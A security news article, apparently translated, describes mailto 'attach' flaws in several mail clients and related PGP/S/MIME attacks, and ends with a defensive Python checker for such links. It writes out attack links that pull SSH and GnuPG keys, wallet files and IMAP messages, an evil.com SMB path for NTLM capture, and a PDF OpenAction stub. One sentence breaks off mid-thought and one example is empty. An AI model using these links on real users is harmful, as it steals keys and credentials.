Researchers from Ruhr University Bochum (Germany)
The mail clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) and Pegasus Mail were vulnerable to a serious attack that makes it possible to directly attach any local file, specified through a link such as "mailto:?attach=path_to_file". The file is attached without any warning being shown, so unless the user pays special attention they may not notice that the message will be sent with an attachment.
For example, a link such as "mailto:[email protected]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" can be used to insert private GnuPG keys into the message. The contents of crypto wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) and any other files accessible to the user can be sent in the same way. In addition, Thunderbird allows groups of files to be attached by mask, using constructs such as "attach=/tmp/*.txt".
Besides local files, some mail clients process links to network storage and to paths on an IMAP server. In particular, IBM Notes allows a file to be transferred from a network directory when it processes links such as "attach=\\evil.com\dummyfile", and also allows NTLM authentication parameters to be intercepted by sending a link to an SMB server controlled by the attacker (the request is sent with the current user's authentication parameters).
Thunderbird successfully processes requests such as "attach=imap:///fetch>UID>/INBOX>1/", which makes it possible to attach content from folders on an IMAP server. At the same time, messages retrieved from IMAP that are encrypted with OpenPGP and S/MIME are automatically decrypted by the mail client before sending. The Thunderbird developers were
Older versions of Thunderbird were also vulnerable to two other attack variants on PGP and S/MIME presented by the researchers. In particular, Thunderbird, as well as Outlook, PostBox, eM Client, MailMate and R2Mail2, were subject to a key replacement attack. It arises because the mail client automatically imports new certificates transmitted in S/MIME messages, which allows an attacker to arrange the replacement of public keys that the user has already stored.
The second attack, to which Thunderbird, PostBox and MailMate are susceptible, manipulates the mechanism that automatically saves message drafts. Using mailto parameters, it makes it possible to initiate the decryption of encrypted messages or the addition of a digital signature to arbitrary messages, with the result subsequently transmitted to the attacker's IMAP server. In this attack the ciphertext is passed through the "body" parameter, and the "meta refresh" tag is used to initiate a call to the attacker's IMAP server. For example: ' '
To have mailto links processed automatically, without user interaction, specially crafted PDF documents can be used: the OpenAction action in PDF makes it possible to launch the mailto handler automatically when the document is opened:
%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[…]) >>
endobj
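A defensive check for the link forms described above, added here as an example and not code from the researchers or from any of the mail clients: it splits a mailto: URI, rejects the non-standard attach parameter (naming its target as a local path, wildcard, network share or IMAP reference) and flags a body prefilled with PGP ciphertext. The function names, the allowlist of fields and the sample links are assumptions of the example.

```python
from urllib.parse import urlsplit, unquote

# Policy of this example (an assumption): only these fields may be prefilled.
SAFE_FIELDS = {"to", "cc", "bcc", "subject", "body"}
# Non-standard parameter that the affected clients treated as "attach this".
ATTACH_FIELDS = {"attach"}
PGP_ARMOR = "-----BEGIN PGP MESSAGE-----"


def classify_attach(value):
    """Name the kind of resource an attach= value points at."""
    v = value.strip()
    if v.startswith(("\\\\", "//")):
        return "network share path"
    if v.lower().startswith("imap:"):
        return "IMAP message reference"
    if any(ch in v for ch in "*?["):
        return "wildcard over local files"
    return "local file path"


def audit_mailto(uri):
    """Return (findings, safe): what was rejected and what may be prefilled."""
    parts = urlsplit(uri.strip())
    if parts.scheme != "mailto":
        raise ValueError("not a mailto: URI")
    findings, safe = [], {}
    if parts.path:
        safe["to"] = unquote(parts.path)
    for pair in parts.query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        # Percent-decode only; '+' stays literal in mailto URIs.
        key, value = unquote(name).strip().lower(), unquote(raw)
        if key in ATTACH_FIELDS:
            findings.append(f"{key}: {classify_attach(value)} ({value})")
        elif key not in SAFE_FIELDS:
            findings.append(f"{key}: parameter not on the allowlist, dropped")
        else:
            if key == "body" and PGP_ARMOR in value:
                findings.append("body: prefilled with PGP ciphertext")
            safe[key] = value
    return findings, safe


if __name__ == "__main__":
    # Constructed sample links modelled on the forms quoted in the article.
    for link in ("mailto:alice@example.org?subject=Hi&attach=~/.ssh/id_rsa",
                 "mailto:?attach=/tmp/*.txt",
                 "mailto:?attach=\\\\share.example\\dummyfile",
                 "mailto:?attach=imap:///fetch%3EUID%3E/INBOX%3E1/"):
        print(link, "->", audit_mailto(link)[0])
```

A mail handler or link filter would compose the draft from `safe` only and show `findings` to the user before anything is sent.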
source: budenet.ru